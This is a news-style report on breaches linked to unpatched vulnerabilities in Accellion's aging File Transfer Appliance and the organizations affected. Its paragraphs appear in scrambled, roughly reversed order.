After the first vulnerability was patched in December, the attackers came after the FTA again and again, he says. Web searches turn up public facing portals for customers apparently still using FTA.Īlthough there was much York says he can’t comment on, he did provide some background on what Accellion has faced. 11 - about a breach tied to Accellion's FTA, followed by Australia’s securities regulator, ASIC, and an Australian law firm (see Australian Financial Regulator Hit by Data Breach).įollowing New Zealand’s disclosure, Accellion estimated there were less than 50 customers affected, but York says that figure could be in flux now. The Reserve Bank of New Zealand was the first organization to come forward - on Jan. Until Washington’s announcement, Accellion’s problems had stayed in the southern hemisphere. The Washington State Auditor’s Office says personal information related to 1.6 million unemployment claims on its FTA may have been exposed (see Washington State Breach Tied to Accellion Vulnerability). On Monday, a new victim came forward that stirred more attention. The Australian security podcast writes that the issues include a SQL injection flaw in the FTA web interface, an XSS flaw in FTA’s file manager a blind SQL injection and command injection flaw in FTA’s administrative interface and an unauthorized upload vulnerability. But that was just the first of a series of vulnerabilities that have been found. In mid-December, Accellion patched a SQL injection vulnerability in FTA and privately notified its customers. “We have very thorough processes.”īut a batch of SQL injection vulnerabilities uncovered in an aging product is very different than a supply chain compromise involving the infiltration of a company’s build infrastructure. He likened Accellion’s situation with that of other companies such as FireEye and Microsoft, which were among the many organizations hit by the SolarWinds incident (see Microsoft Describes How SolarWinds Hackers Avoided Detection). Joel York, Accellion’s chief marketing officer, tells me that a recent external audit of FTA found no problems and claimed the vulnerabilities were hard to find. Over the last seven weeks or so, several SQL and other vulnerabilities have emerged in the product. Accellion prides itself on secure file sharing, so the appliance – given its age and wide use – is a juicy target. The product is nearly 20 years old, yet it's still used by hundreds of organizations in the finance, government and insurance sectors to transfer sensitive files. Recipients get links to files hosted on the FTA, which can then be downloaded. To recap: Accellion, a privately held company based in Palo Alto, California, developed the File Transfer Appliance as a secure way to overcome limits imposed on the size of email attachments. It’s prudent for those still using Accellion's FTA to wean themselves off of it if possible. It’s not a straightforward story, and it points to problems around balancing use of an aging software product with risk, a reluctance to move onto a newer platform and internal patching hiccups. See Also: Live Webinar | Generative AI: Myths, Realities and Practical Use Cases What went wrong? Where does the fault lie? And what can organizations do about it? ![]() Several data breaches stemming from unpatched vulnerabilities in Accellion's File Transfer Appliance have been revealed. New Zealand's Reserve Bank is one victim of a breach involving Accellion's FTA product.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |